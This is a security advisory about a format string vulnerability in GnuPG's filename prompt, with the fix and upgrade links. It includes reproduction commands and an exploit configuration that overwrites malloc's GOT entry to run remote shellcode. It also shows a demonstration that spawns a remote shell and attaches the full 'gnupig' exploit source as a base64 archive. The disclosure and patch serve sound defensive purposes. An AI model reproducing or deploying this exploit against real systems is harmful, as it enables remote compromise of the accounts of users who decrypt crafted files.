COMMAND
GnuPG
SYSTEMS AFFECTED
GnuPG
PROBLEM
'fish stiqz' (Synnergy Networks) found following. GnuPG is a very
popular GNU replacement for the public key encryption program
PGP. As described by its website "GnuPG is a complete and free
replacement for PGP. Because it does not use the patented IDEA
algorithm, it can be used without any restrictions. GnuPG is a
RFC2440 (OpenPGP) compliant application."
Hidden deep within its code is a format string vulnerability
which can be triggered simply by attempting to decrypt a file
with a specially crafted filename. This vulnerability can allow
a malicious user to gain unathorized access to the account which
attempted the decryption.
The problem code lies in util/ttyio.c in the 'do_get' function.
There is a call to a function called 'tty_printf' (which
eventually results in a vfprintf call) without a constant format
string:
tty_printf( prompt );
If gpg attempts to decrypt a file whose filename does not end in
".gpg", that filename (minus the extension) is copied to the
prompt string, allowing a user-suppliable format string.
In order to show the severity of the bug, look first at how it is
reproduced.
1. Create a file with a valid format string as the filename.
$ echo "hello, how are you friend?" > %8x_%8x_%8x
2. Encrypt this file.
$ gpg -r fish@analog.org -e %8x_%8x_%8x
gpg: this cipher algorithm is depreciated; please use a more standard one!
$ ls %8x_%8x_%8x*
%8x_%8x_%8x %8x_%8x_%8x.gpg
3. gpg added the ".gpg" extension to the new encrypted file, give
it a different one.
$ mv %8x_%8x_%8x.gpg %8x_%8x_%8x.el8
4. Now, attempt to decrypt the file.
$ gpg %8x_%8x_%8x.el8
You need a passphrase to unlock the secret key for
user: "fish stiqz (bleh) <fish@analog.org>"
1024-bit ELG-E key, ID D31DF63D, created 2001-05-24 (main key ID 5ABD075F)
gpg: %8x_%8x_%8x.el8: unknown suffix
Enter new filename [ 80af5d9_ 80cefb8_ 80af5ca]:
Now you will notice that the %8x's were expanded! However, the
actual filename is not our format string. The original filename,
which is stored inside the file as part of the encrypted data, is
the real format string. So the file could be renamed again and
still produce the same result:
$ mv %8x_%8x_%8x.el8 README.TXT
$ gpg README.TXT
You need a passphrase to unlock the secret key for
user: "fish stiqz (bleh) <fish@analog.org>"
1024-bit ELG-E key, ID D31DF63D, created 2001-05-24 (main key ID 5ABD075F)
gpg: README.TXT: unknown suffix
Enter new filename [ 80af5d9_ 80cefb0_ 80af5ca]:
The exploit created simply creates and encrypts a file that
exploits this vulnerability. However, considering that there is
no possible way to determine what type of machine the file will
be decrypted on, the size of the remote environment, the location
that libc is mapped, etc... the exploit will require a lot of
knowledge about the remote system for it to work. For this
reason, this exploit can be considered "Proof of Concept".
There were a few hurdles to get around while building this
exploit.
First, since this a remote attack, there are only two ways to
feed data to gpg. 1) Through the filename and 2) through the
encrypted data inside the file. Option #1 seemed easiest to use,
so we used it.
Second, since there are limitations on the size of a filename,
255 bytes on Linux systems for example, we need a small format
string and a small remote shellcode. The format string and
shellcode combination would be located on the stack, allowing the
Linux kernel patch from the Openwall Project to defend against
this kind of attack. However, this is not acceptable for an
exploit by fish stiqz. Before the vulnerable call, the prompt is
created on the heap, and the format string copied to it. The
filename (our format string and shellcode combination) taken from
the data inside the file, is also copied to the heap, allowing
two different places to store a remote shellcode on the heap.
The first location is complicated by the fact that the prompt is
filtered through iscntrl(), escaping all characters in the range
of 0x00-0x1f and 0x7f. But, since 'fish' thought it would be fun
to make some remote shellcode to get around this, he chose to use
the first location on the heap, but either one is fine.
Example exploitation (overwrite the GOT entry of malloc() to
point to the shellcode on the heap):
(from config.h in the exploit)
/* <FIXME> */
/* location of the *local* copy of gpg, used to encrypt the file */
#define DEFAULT_GPG_PATH "/usr/local/bin/gpg"
/* contents appended to the format string, or NULL if you want to skip it */
#define APPEND lnx_i386_remote_shellcode
/* only needed if appending APPEND is defined, NULL if you wanna skip */
#define ARCHNOP "\x90"
/* the overwrites (most definitely needed) */
short_write_t short_array[] =
{
/* overwrite 0x080c9dc4 (GOT of malloc) with 0x080cca60 (shellcode) */
{ 0xca60, 0x080c9dc4 + 0 },
{ 0x080c, 0x080c9dc4 + 2 },
{ 0, 0 }
};
/* </FIXME> */
Make the backdoored file:
$ make clean && make
rm -f *~ *.o gnupig
gcc -Wall -O2 -g -c gnupig.c
gcc -Wall -O2 -g -c common.c
gcc -Wall -O2 -g -c file.c
gcc -Wall -O2 -g -c shellcode.c
gcc -Wall -O2 -g -c fmtstr.c
gcc -Wall -O2 -g -o gnupig gnupig.o common.o file.o shellcode.o fmtstr.o
$ ./gnupig -s -e 366 -a 4 -k fish@analog.org
[0] shellcode passed.
[1] running gpg to encrypt the dummy file.
gpg: this cipher algorithm is depreciated; please use a more standard one!
[2] created dummy file successfully.
User runs gpg on the encrypted file:
$ gpg *.el8
...
Remote shell is spawned (in other terminal):
$ telnet localhost 16705
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
id;
uid=1000(fish) gid=100(users)
exit;
Connection closed by foreign host.
There are a few other tricks you can do, like doing a return into
libc attacks and writing the payload with the format string,
which can be performed by this exploit. It is a very versatile
tool. Unfortunately, or fortunately (depending on your point of
view), these types of attacks will also be unreliable (due to the
fact that we dont know the remote environment or how gpg is
spawned).
The exploit code is attached.
---
Content-Type: application/octet-stream; name="gnupig.tar.gz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="gnupig.tar.gz"
Content-MD5: SuIvRNqyAFGpM66j1y1fEg==
H4sICL3fEzsAA2dudXBpZy50YXIA7Dxpc9s4svlq/gqMMh5LjizrtJM4zryM4yTezVWZTO28
SlwqiIQklimSw8OyZifvt293AyDBQ87lOLVvzIojEUej0Wj0CWjmp6E72731LZ9ud9jdH43g
s9vbH3Xxs9sbDulTPbe6+4PucL+/Bx+3ur1efzC4xUbfFCv1pHHCI8ZuTd14fnk7EcXXgdD1
PjO5/nawWAR+51IKfPHT7XW7e3K9a9d/NBjR+g/2Bnu9PfjeAz4Y3WLdb4JN6fmbr/9td+o7
YsrG46NXL168ejl+Nh5bt6HE9UWx0NrdZtPUtxM38FkYBUmQrEIRs+1dy54DCbcX/EyMw8j1
Ez7xxDhO4OusaQd+nDDZos1i908xTtoMGrUOrNSP3ZkvHHxlnvDHi7MwSpqyMdTjkIozbRzn
PHAdtv2Ce15gNyUoaCVL3whZLN/0SLqa0BqLKGpqTDqdTrFyEc9KlTRj1xNycFlnR4InYozF
WeviJ3a8LXzHnVrfe3E/4VH7/wWsHc7pm4zxkf3f6/bl/h92R6Nhv0/7f7R/s/+v47n9tY91
m2nmYdMgYpKh2oyzp376+il7cMh6nW5nxMRF6AVuwiar+ww6MSQ4ixP3jz/ZA/z+P9znXjDr
BNHsofX1aB09ef7o6a9sY+OQ7fwLRAPbedVnOzPr+WNVcWgd/36M1RJj6+iIGs9s23r1yz/y
ik6gZVAgpUHA4rnwPDtw8Pt0kYCk6wRXgLIFaN5nGz82AbGWZdme4P59ayNasJ0p2/4/tg3D
6Ur5eR8aA7ItCz6PjlpQK6fdYju6KZMt4EPNHDp37E5wv6aPzX58YMHzvZny5rm2p2j/2d9k
jI/I/3531K/Yf3vDG/l/Hc9t17e91BHsQZw4btCZg+w1izx3Uinj0QzLLKBc4tqsYMVJW8oO
Uvh+yLrSiLLYNjuOItAO9lz8seWzZcTDUESkMBZkt3WsNQYe81vWvy0Gj6xMFuEBvdJ/7rTZ
hBIYSoJp+q0WOzxkL397/rxFLWRffKaE27QJMwBDsM0aqstm2mJTDpLd+QGUlJuA1Qr233u/
0YaxD7LuWAUS9eTt+Mmjk+e/vTlWdR8s+ohEkkY+I/Q+4Kwrk45EZaZFozVMIm23fuqsFcwm
df2cueuO32jytOT/gL0FdgA4DZIt9LIbFCjb5aBNpfWtZ8/HnotQohl+GjSozOjdzilroPGt
+uG+TpqqYxv1tML5vNyVBlUNdRs+BhO+mRfKMadeGs9Vv5axzo/dJAkq08o9ii+aVpAmOK3N
FObVNjfWnTufO00C9QXThH44TcLue0uqm+dbPJn+96dg6n6X+E9vuN+r6H8wCW70/zU8Un4d
0fKnEafgzlxwRynnZC6UH6fctw41n3N/JrAyFiBDvFTELAnYcs4TLFyBgxSknsMm0iVcBWnE
4lWciAV1xz/0Ai/1AFGWWpYZnnr55ORpJTyVFeYmSkO5ZPMGaaIHT05+f3H8kODBKyg9Octg
SrPbxgIP40zhCstmITivsNgOzkj4drQKaVLk+yEQPfrj4yePfnv+dvz09dPx60dvn7HGbhpH
uwRud+L6uwCpoUJYfiL8JGao/WA6BJpABtECSCYjZW0GpELdDeodScaWHFQmtIzP3JCB42yM
/ej16+OXj5nnX4zdwd29cSQWQSLGmV9Kwwa+t2K+EDgggJSDw0C6txszCc5pl8f1uRzVHPLN
0bOXr16zxvuLe105L5xCcC6iZeQmwAHNRQAqjZrDezZ2C6EAQ0TJmBqCcSPfeBTx1btTdqiU
IqKsobHuRfdu177n2EPWfPrqLa6MNNdabOkmc6iHapvvdVkzmzWNRHYPVGNd2wRzh3XZh3ZW
j+Wl+r5R38bW1gdpvz7YNXjovye29ymPkv9qy3wP/683hH8q/jcYUCwQ4/838b9reaT818vP
dlgENh/s95gkd0FAMYp9g+hEIS61RriK3Nk8YU3Yln1YSuj/caH+BS4nDk8uZy7kdcaqsU7w
I4bSLwHlFKUCxRtKLNJXJJO5C1Wc+anngT5KhDTg0VGZ83j8p4iCuJk5t14AFKC+2ohHL0wC
+wnlCD3TKblg8Mr++ouVqqfTbteo1s5VoRW2KbQyq2VlXt2yNpTn1VOmu/BikRV2DQ8FyBXy
CPX0MmAlaQzUsaGDiHMCYPOx8MQC9Faz2Hx76kboaZRKYwEkdTRtFAbUdOehnMEOk23UOyFX
XidYHz9dTMD6AIGvxo8psIBVxSFJf0iUCyGIeClVyxhd6WaN5onfnWo8Cx1dGbHIfLHlHLM8
qot72pHT+AEa4brk5dxxgHgx1cCSuHfuHBTcYtdYB/LJgOuA5XBGlSkakzIdZNXsC2bzFTOR
IYQN5UY2Nm/PL+6/TzZvexcUHyiBa1fhgO8oqSFDBRkRYmxHNMjmT0r9D6xottqIrz1XzVyf
8dhWpksQOYX4ATYZy3E/hzbAY0RTIFENt8SUwnOnaHg+Pv7lt6cEoG4lYuVHaxLtVB6gFLRR
NgM2lXOUvdsZIjLuE0yLkwBKqNBQy9yQCLCE3Trk1MAZ5TFVgzKvKNgluUHDxZJsTFl03HeY
40bCThgID74QCWxMBMNtG5a3w9hbsmLTCBaPR7MUR0e7kueZ4gSdAjCJ7dTjCJP2McwVNjhC
Ip5XXDdJp1MRtaWgBijwD+3SNhq/Sxe4hccxDKFJlY5RJoPRR1ykhJdKRZ9JVSBZYw1ntIs8
AbotLhWhIetyr21tbLAKDzW3KVSHyAPiLZ21XstviqZrOe4ycVROlEONwk3Wy7EVKlCpIqjN
pjHwdkY3U6W1WmD49lp5LYJqtUywILPPLwPbH30cBiwHHggwingsZsgu72qxQoCnRmtbt+6P
ZDFVVXZ/rENYC2AIkTQVRcjOh730leRQQBU96oGuJ4b2ceQJghrG194L7M2mXHtggQcG78D7
nTuZWNZTVJRR6KhBdSkNvAGWSm7RVKU06CyAVxtU1RhCd4bdyU6CbcInAAREhxRvG4aywx0L
JR+sDULRDlcGinqT/FRBor1mOQAU8A247PlaZnMrhKCBstACtUXRiCCE66hNEiUSIZSh1FLE
B1KZ2xo1oYynb+C2u3PIzFqNk8JEGl+q3afwWi1TIHuBq4GyMw6F7U5dQPZrOMSu5RDb4JAN
YhFE/GFZq1/CGzb3/UDpCobGQZtEUxIEzANlIOqMBM0s00gIg3p5mdpc65iKEC3bMTs0rrK+
SC74Ctd86uVZA/6bm5upjf/9OEdMtZCvhd4m9UCB9w25zJ83jhwih5GzU91oOdNnssauZXol
Vg3RDG8AICMtyCJVogl7iXzDMWG7KqBtVuRuhVFWm69UZjCXVrVmUQvOgdYJHyQEZaKAGTJN
Pel+utLq4zA4t8+QfizC0GOnw+q0vePGYcljS5ATE0Ov535cjf7XyrugtHLqDrrdy5Rcjf7t
f4meKeLqiDghgfOub2rEeAHovRt1TxVR82bdU8BAzvugVNXLqzDepboW1IMJp4XeQV1V77SV
SZkv1RmFrW3w9BrV/UWU1ApIw8r0jznL9aqnCgL3U13jWtC90zbJiUuFv5putq1ousBorYNs
W5V3Xs0Oy4usgmAiLsmdC3yTIunuxXg8JskE34qvSlApcdVbs/0lrLU7eqO6m0HULXE3x8FC
6Oj7Fqo9f0snEdDhUJs+cw7CMApgNqgec62eyYN6sx8qmle2uatGOSg6d+HiAYf+aAQiewh/
vb1LNuf6Ra6lbeMRPL/Ak+WzlQMvRblqh4yP6p9wybbjx5dernlBHeGsFHC9rhvrFtzYqtVl
10Jcpv4d2Avswli2rd+3iEDcBk8y1mkQ8FEVP1AsspgUUQcVeEKKIGYL7q+UUQdvMsVg8gAM
OuYeLFieeif0C6tIDTQ/yBZAAX0aQ3cx6K3I3YM/2fdSD0FBzHSvAtDG+bcVgMrOKVEQuV5E
3ko2j6v5IkqlAeORqwyu+TxwQCeDKy5iSmS9AJ9eeKzxgv/+e4P9k4tFOGXNt3Pun8XM4csZ
O9hpWZWTzXLcAgknrq8PN2+LC2Gfi7Hwz+M2K1A4OytSfYoKjfZuxU2mKsyxkeys2XkXinL6
kIJuSqyL0mAnWzBAWGqFg8xcvpDmsoH+u4tTbd0fsAttNhdB72TbotiRoFcQyVsbHJOjQNhL
NOTXB6yZd94ECdJSNfkBj/wgSYNqKMCSRVOc+2wzJTO7wFMZQ+d7QbO0blfLet87F3HzXP9T
zP99p/Mfw275/Md+v3uT/7uOp5D/m4MMNQ5/6KxgTb7v6LPyffoMx5MXb399+6Z0hsMotCy8
UoRtZU4KamXoVpqH46SsNGS0WqWTqupEeSIo2woh4APrsttMlyQAQXJ+LDtWSYyV7zldlp7a
Lt1Xqk/7ZK3WZz+wySeEwreLdlHp7bPC3pXxqs54yQsvjlYFUDbisxZlE28NoPUGTWbN5He3
ysv8/+yYx9pHy3+65vaNxviI/B+Mentl+T/o927k/3U8Sv7LW447bEH5QfQ1nHSxWMlDbzKF
pw9M1DoiX3eswyhbxbt4raBaSuK5Wrzkbqnx1PYTr1iU+i4gUCwTUeQHa8+UWOICPFRfxg6w
5UHmmEmxEudnAvVhwTgNQ/DXKvTBulk461R9LeMWaR5WpVdoPw55MtfvZ2LlZocrnpw8P4Ye
6kZA6DogyeF/+UoqBihoBibxGCOhWokTG6GE0aUJPF8svxKC8qB4NIvx0B/7t0ruNnYicGBo
gvgiGm2WEYOOJX6ogUJ+mAml2nIeLITjohs0Ewm0bzaevXpxnEVUikkXfbhThUObU7xcMQXF
4RtRmWWjesFiA3RLBM5dgxpfGtichino6cYzAfRrs2fBkvFI4InLn8mFm4baXbW9IBZNeteo
1h1ELfmHUer7yG3AOuWjq/le7sjgK3Y114NCxprnCtVEaKourbsir5FhIPoeNj4hw1CEDZRV
PQvRsHIjPWAetG4C09MyRWdNuTL5oRVc3rnrOUioDQmqWZxx26RA25xvFuQiOmC2JweKh6hk
tnBDxuRQAAEeiEub/YQ7rw1ogG/fzQMK+T0chTmJFIw+HJ+8fPumVag2XPOchXJ8PuTpFs0c
gBFfCBVKo1UXToFLNNmVGMg2WIngWXWjg2eXi2umBMCavlltoyO8uw1jkSRyBnDVtFU6ZKS2
kWxO+4gC27pf64CpEt3/kp0GNHHAdlZ7O/Cc8v5Ofc/1z3LZpXKHGglZnc2igogZPlHoyNDd
99bmn/8o+y+/0fwNjMCP3f8c9nv6/G+/h78F0hsM+jf3P67lUQfy8uU3jwCDGplz3/GEOn2p
G+lLHF8cELjaA8DaMgO/MC5iSgklPwhrUg11NmzuXmYQ6s0zrNHfOcAvppZAJIzz9JKRVZAg
+qO9T0g0FTNMvT1MM7XxKGl2TKVif2WZfrwK8bCUF8pvWjZy8rhxflxDpoqwaDOVdBPCIcJN
YAlUoJlCAuY4OhW2w0r4ZBLcoAadnrj8Jqk+2qKgFTozN58kUV0nv6jmsFDVyhJYBog2ozrj
xIJSbj8Zjd6VJkTTPMXzDo4oRs6NTjpzQ9vCngv7LJZuU5Ed1ZmjBThSuMjcThif4qFKF49N
Kk8M3tGhmEcpq/1JHeOUNg5U4VVCtMCQ9phGP6yH15TcXFzVbh1PquQncnWvwohyENKlJqiW
eRy97vSS2bh4fglgY+k7lxI1Ej6+/PWX8QJW39buVn5MKZKQ5csELPwzOjhkshgdSRlX1/Pv
mASp6P9vkAL4mP6n74X4z2AwvPn9r2t5yvofUwAgllLuGWILkwEwf324snoh9EqyA78+O37+
/OjV4+NSgqBYjkLWiNfLgyW59XKpFq/5qa71YrSlsgR+4O9EbhiCDAyDKJm4PuZH5JH5kMd4
aN6NbR+kWLNFSiUO+ZIuFhFEhvkFzFL09va7owy/tVc36UJk4/3FoPf+wu6+v7h77/3FcPj+
og9/g7vwncoa2CQrHspm9kBXYx01oWoomsDf3h5UOVBl63JqYkPR3fJA8D4cYBdqglUj1Qub
ICR7XzeXuEDRsCf/EHWnr7oZTe7K8feHOSRssp83wZlMoKeYvr+Y7tVCGdwtz0JNfh8HljMy
JmzObt/OoIwKgOFzT1EcyiYSynSicOipASbmwBmUykDFJpqS5WbDCf5JukzkAM69fBn16k/k
Gg2mRk+cCfxN9zWlc1yg2T0sQjwAh3vQZCLwnZpg8T2Acm9P9nb21Se8j/YllD2JgxhIiKOB
ekciOBJdLNZLCd+H8NlHfLqIo+SXbgM3z98lh/Lf/Cj9jx+zDnfO3TiIVlc8xuX6v9/tD/ZL
v/867A32bvT/dTzVG2tf/KhA5RtSaIxHEzeJeLQix4nCqykl289TzxcRn7iem6zQpCj+TmAp
FloOjf668qH3bMVeimQZROBmNedJEt7f3V0ul51Y1XZ8kexWw6r0/FL3yxNmx4eXnGSD2XmC
x3jyqjva7d/bRTvHunoi6qfJ/uWqq6Jvjh89V7SapDMWEh6Y6gFXPQ1/Zq0rReNKgb3DHxiR
P4ERqLt9j5SoYaeW1e2wE7CfAiel4xhWr8NeRwE4qAur32G/Bh4xjjXosGP1G5KPweJKY7wj
Yw077Aj8ZShEQsjjjVeNvYkdIixXge45nguYQxiEqQdS5OnL3/BGkcdtOreR/YJKmE4818Yc
lw7QI+Zgxc4ivmCvn77uMPYIf40jtiN3AobmBDYGXooVkxgv15gsLiU12M+7rfuW9ZAZuOCx
FIp60zFq8HIryNBQvwibkzWfMCcA69UPEoCDJYQrHsjGBMLJ4+NHjHuzIHKT+YIuYdrcx2AQ
JTzxwm6QItVX0DsSGEsgAsUdE6c3T476w2GXNV+FwofhWxJLF3/bhIfwRf4aS4dZ1jPXcYQP
VBAhQccYCRBBB6rKl1aLckTa4xJBCxrMZhRFid0F5mSBnjxJxCJMVD7WETI7xmVmgG4fc3nf
invQwY4wLuNYWIsJCbrqCkgUB8XhMLi3hL4LDnNxgzRG8kSU8+Wub6U+BzpF7p+AjLw1q0OR
8Ea/kicxV+hR4Edo9Oi3Fq6Yl9XOQjbGy7uheiUqe66g+9aw37zdJFm5AXhUyunbcoLxTCRb
2akpefs3wrWxOJ5J9XBmxs1fLIL5bAEgGXOabrGmnK04Bx5LidLAOamnrnlb+jfLqG8r5zFG
vyLNJRfnPEAbAJ98iCbOCAjJ0H07oZ/z0bSN6xZ+HsQyo0opNL0fKE4MGMlEWNuiUF7Wqrlw
/VRGmvGYgI9yqIUsagehm/+6j0JEHWS3iFHkbSbkkB06LuBiHK4UisarUFe75lqE6kXXXAxD
07oFk3PkXPWTPXJmjc24YdxFrCU1tmmbBEfgvliCMIB1lQoKBL4UB019qxHV/F7LPFACpIvB
PIhwT03dizazOAo/uvHNcAeTBEPa0el/GIFNBZc/WcHYSSaYgglCxOQnoGTVCk0nWPpewJ3O
PFl4KHZhEIkfGXiUkod1CPwZUCONZrScFvSOOKYTANEgwB8kAJkP+gcoeOUbtKrjYNVOfPnT
B3TOZA4Ch+LKsI2IZiqjAWZBm3lBcCZ/dwP4nmFTGVvGm66ow/C2BGrYI3n4oSgAz0GIOSU5
y/OjLiQJMYj6IxP2PGCNuTzLMM/PMgDpXdg8PzfYQ4a3itSfhZr8ODuSAAtOpxEkLNyjOxEr
xYfYjihAYNjuvuxsuyGInlw7yd+yCiMU3yBDD7R1hEoNRHMQKUOJRw4LfPGDHNeLzQG2ocx4
LbygGLDQACFx4jhKTEvxkAsBvfORQYuZ+DabueekcrkFLvFU0CkCQEWRYHFeHq7wLry7Flo6
L4NlW4szU5rpBTIIWunO2P/C8uAGB5Jg4CqcR0gjAJPClrD/0961/7aNHOGfj3/FxsVFUk5S
JCdOrnIcIAfLRYAUCS4OesU5NSiSkljJJCtKfiDo/975ZvZFkXJyba5BCzFFTya53Nfs7Dy/
XWiailbJmkUVIgMqhGUxUgeexNwmqp936va8A3p7ODh82iPBX43f/Kk3xme6JEio0yfD07Nn
T067OuYmZvtgb3DUO3xK7BTuENRIbx69+ul08PzorBOYCd/qyIhau8hoFatyMyVmQa+NM7hQ
mCsYFv2r+nEQTo/iP17SjyiZTn68lDtR+HFE/JUGUrDOIF0Tw0+jxPlrqKYW+M8K/L0Igdj2
QCFgB+utqzdvbF9WPAD9YdsA0N02MwdPJCqdpTRStoEG4gScb03kGQfECdPYC0YCiwlXa7O2
HTnF4TrssudunnB21HaNwfvcfSYyQHwSWEFzD7GEJUSaTeq85goy+eiKbMijRrqk8Ycecvrn
cf/8l3NLa96t/1kyc334NylsUKUw3gsN5v1rNQ9p+ZtWaanURBJiMvT8loYhgxgDXVxvkRXZ
s+8RJIQjoh2JNdREvNI0GZh9St2Ed8IyqCtXsKwLXONdkQi4XjTHTUs4vDImVhQlCs2zro/e
oumPlf0ku05pz5QUeNy3KIvcnmU6idCcK2AQxt0gWUf9fl8LUDJC2jP6j026Aste5kz5mAaS
IWcJkoc3a79KwZMMoNWkzAthDaBROWOdiyqjwS2lyfSHqUYLCmbEaC4OSCCmmvJpQDpqlBTr
gz7PHTWDOQDNB037fLOKlxIRgdzpcEWieyxZmbTtpstYxt7VxFLcmUbKSjNeYKzE6OYTEw+j
RVdPFTZPhmtc3+QBTRRXNE30ajcBpApxdedzqns2r+zJTEGHHfiM+VlQ5xhqi7/Qx96ygqH+
MKTVmIA10IClEN0g8JTwCOdEuKzswc0TvGf0Ltcd03D2l/NslyrPKiQSegwPgQyct0mEpN6Q
BH2r51CcOMltCEGPGGNiuEcJxMdtaSSzTwJDCdb9Y/CItgs4TxYpnxNixNzxG80aAybWJLaN
l5mx8jruSXsXySpLllCRiXVDxuRn0Gxv0NKASOnvAEviZTaFDsHcttQizyKV6BOZ+35lSxG4
I6ji0BKLtdELqP3eyRm+4eq416FP/JRMId2s61J9N/CUEMhMmvnoXs6TsOjy6NQDlq0eE4CQ
z31Ka9e2uN0jTAQZLkijZ2mc1doGQuStLFwSrW2pT7qBdhZoZTjJic0avEp4+3TryjXE66ch
DCzHwLImVtiuxAQhNhduE4IyrCjghs8PzMAiC6zTr6uSMgoLHgqiAi+/WavODFmBiQfAX29w
O5zymAWD2+dTTOHG8ojXCgovfKhgiRZDd8OSJYI3JHl+u69BlS2Bmmg/pJbkeuMtzXhDLXAI
uD4lTDa036RY1RBLpccsno5lYRoq5KK0wbUdViv7hN+eE8dZr+4cUmu7g7qLPBUY22okjFc3
7cFtXkwGhNqMm66xs4fx/T+G8R18KxzfAFh4ojcTN45zSOFMHUb0xWM+g0c9fMh/0e3KWTzi
O4OLYhZFlVOGcJSOPj0o2vHYnLiy47Fk5Ox46AU87CquUzcbH9uW/6YDjpQMS/+xLtwroaE/
efZM9UIgYCxqCjy9j9QBt+g5XAJoDQpINF+WsPB19X6q+fCj3Qq9HKdyw8bZ6Wa5vCOm9wE2
XGpgya3TzKqq0o+crv2INWyFEx7Q6eBnjz+zioeIkCTmEm1ibjmzWZHDw2WHv0NLLUuEOS/n
WIEcL0KPzld3GKXh4fP+gP4NqRK6S8JqRqKGMCFbCE/G2IwStw2hAa2/fWzhWUpDhBZu0vhk
OBgM2piyjprJn202gaE5CNI8drWwNRdJKbxLQuAAfIFUaITl0MrKunerFEGQ4EQQuuMckaIL
mFjFBmqwUTO0H/pBIGKRqEPgHkb2KsI7WOyEYTTw24rpv0hWeGz284pA/nrt+WxgjaQdBKpW
nsMS+CGjgmvY64npdQNBPzZ/qzaRmcEgzQTRXnY24mjXaXLT6Wo4fAlLoru2PwJdCQkHvpNs
lWirbzveJHYLsVLHDYaIvgvVhyFR6ioWdhiY3EB6jro6X9dwDKfdtl9N7Mf8S7dbTKcxSbFL
ZNmWTmSNiPZZUhMvVx/8NsOUmOJseMbmnXNk2XW+vE7sJKcw7AK5RDBIk/WcNHwa9YD16ElC
UiVLQjOsZDXbiMYEFZC/0DX1cHO0A5VWYwE1Bi6FchSo3lYFdAPUyh/7+cOb8QO8Ao9cQWKp
9eVVZd9ZApFbxMmYWE8fZa6TLL+CJ8iUWTJ4EcfGpavIWNWlGIOwUM3lXaoeqrC8yyIwz685
k8ErSNhQKxlbdVPEbHYwrlijXmCojFcWq/kqRFgwn+cAEg6Iegta8sJyiG9q7+RIaUP7LJ2Q
wt13G8DjqhHEOvKwLuZsh/YDBIMG5/4+dOj3vrz4Hwgrv0sdn8H/p59P6uf/7vO//yuXxP8m
t+IhQ/aPFl4qQb7MyYz/zp7o+c2OAfjCzG53K8Ku/JsOEPDfE63Uv+fFSzfmius7EkicF0Bc
dAnkHEjg8LHZRBIuWesyERwkcFjzEu3yPYz3U9rxNqtIsq/OjcFI64Wee9CiQ9WMtbLvwJQr
yVIeGm4FRa8xSUT5BzkX7pw6PssZ6ZbplTJZJ/pZSXv1ZQbTwpRBTTkhxfsKPy/8nG2DAP4o
dqnPYrSQWAn6zIzkAw8GV+pQJ2iIfI9+F6bOk6E6Vhn9r9frquKHH1THy8VNp20buU1dUox2
Sf89OTHdqSfu0vOTk9ZF1pJ38Xvl/Z62arFj9tm1996Efz9ApbUC0nLkMx0eVx7aTOTmt59u
Zwo3lpH3HSY//h9D5s9FZv7WcwZoZc6juxGlWIykLP/omUAatoYotonipmkeCNvXnIxHMX3h
RLUuLlrHDbPEeUGYp/oAm5JZqz6+ldKr+0qvPld6el/p6edKX99X+vpzpSf3lZ7sKt1Mj6bY
oKnYp9rrpQ4OAZjD7feDQ8CJ4rvHtTfjBhr/55fQsG7Ro8In4kexg8vXuqVQZCU1zz9oRDMT
dlNocpbHojy2Gvlgqy/ApD4LT0ubIUPlqoBLDeeTbB90j9zGpkMDHM/USXyST9rMngWiU0N4
MtbkwM9zlDMDbKaey9/XyXBywx88rh0jVz24BAO3KcMZqQe0e+C/2oWQsdGg9M7m4Nd0H22G
7BZasKTpHfCrI/U9m5ReAJf0JaxKLwa94dFLmJZeMD7IS/WrGBdydl2VHy+yA/2Fi3UvuVhX
od8dSGzlvXD7PUETBR1YiEXop7Ez8F4Zha/yoYV8CC7ltGJnhgpaebOQN4GuYb4J5R2OktVd
5c3yYm3TR5OtFCyXZuR8DJXC44s1H+KxHSrJhgWMA3XSDItAqlWKn+4qniuAeS3DO+cfayo/
Ry9pMUDRVmuSgSRjGI8LCzpSz/4lIgO5wz3fZnDW1SyyCF30x3U1mdXAlBA9b9vu7z9xgm9p
EBsHGWHxdS4ZTMQ9qOEHS/KrRfHs6rwxnVrbdFKHPqPDrbyDpkACA7TBqWjmHCeiTvVJnf/1
3fhy/Mu7rv716lz/On39/p2Bu6lUiT6yT//EFq5ACLcjAcShFdSWgcYIE69ORuFoMSpG5fh0
DpwbgJO8PXOwwkTT0ZwEfE60jWBkbSWtkcyuHh3q5DrfLNsi8HY1Ms/AYPnrZFxTOjSlzYju
Ks7QqM3fWJhv2PkzwnbT24V52yOh+94vzfuViR42vzw2L9dm4NV5c4nTXSUwudtF4mQaclgO
3xbWipkDSvvxPcnOj3U6umhwHN5nDuopPUAUmUF9HpQZTHv0xXZ1TQhKiN1I2DpUZR4Ggkbo
x3TVP5+aR8MMFXXQQSdUoAAZwpu6Z4akWhRj1lyWcQgHt0+H8g++oqND+ScQ2NsfdUPd8DUf
RZE9XwYs3ZwV5LZ377vehNBga8edBh+Gd8lSwANHNH4avPHauSnR2e4eqkMOmAuOwCQdOzdB
CJ7Pr35Wi8+I3fEajtpdPfa2y5KVXiC//zsPharm7NG1akZhj874tKuYHEbuTgswH/iuuc0y
sjhuxk1WNfXXYj9Ig7tmOCooT1bPiSUewkkCLBz0lfoLuziy1lrNcr0phpt1TpSeRpIyYPVu
I6xK1BYf6zHRORc34ihBrGC5Wd0TRkU1Gi230i8L53xZwXPecVzZtH2gZRcIVwIzZqE4dHam
6bpV7TyvmI+I5jZPH73OtsQh1gn7aIJKc8Qqs8zmCsdCPK9fbfobZ9/NnxCWR1Cfc/E5HDRf
6K1+XpPGtzbR7a/9tb/21/7aX/trf+2v/bW/9tf+2l/7a3/9R9e/ACGH1JgAoAAA
-----
In many cases GnuPG is used as a backend for a MUA or some script.
In these cases gpg should be called with the option --batch which
suppresses the output of the filename to the tty and thereby makes
it immune against the bug. So, it should be save to continue
using GnuPG from within a MUA.
BTW, the Windows version is not affect by this bug, but there are
probably other problems with this system.
SOLUTION
The vulnerable call obviously needs the "%s" conversion:
tty_printf( "%s", prompt );
The newest release of GnuPG (version 1.0.6) contains this security
fix, as well as implementing many new features. It can be
obtained from
http://www.gnupg.org/download.html
All GnuPG users are strongly urged to upgrade as soon as possible.
For Immunix OS:
http://download.immunix.org/ImmunixOS/6.2/updates/RPMS/gnupg-1.0.6-2_StackGuard.i386
http://download.immunix.org/ImmunixOS/6.2/updates/SRPMS/gnupg-1.0.6-2_StackGuard.src
http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/gnupg-1.0.6-2_imnx.i386.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/SRPMS/gnupg-1.0.6-2_imnx.src.rpm
For Linux-Mandrake:
Linux-Mandrake 7.1: 7.1/RPMS/gnupg-1.0.6-1.2mdk.i586.rpm
7.1/SRPMS/gnupg-1.0.6-1.2mdk.src.rpm
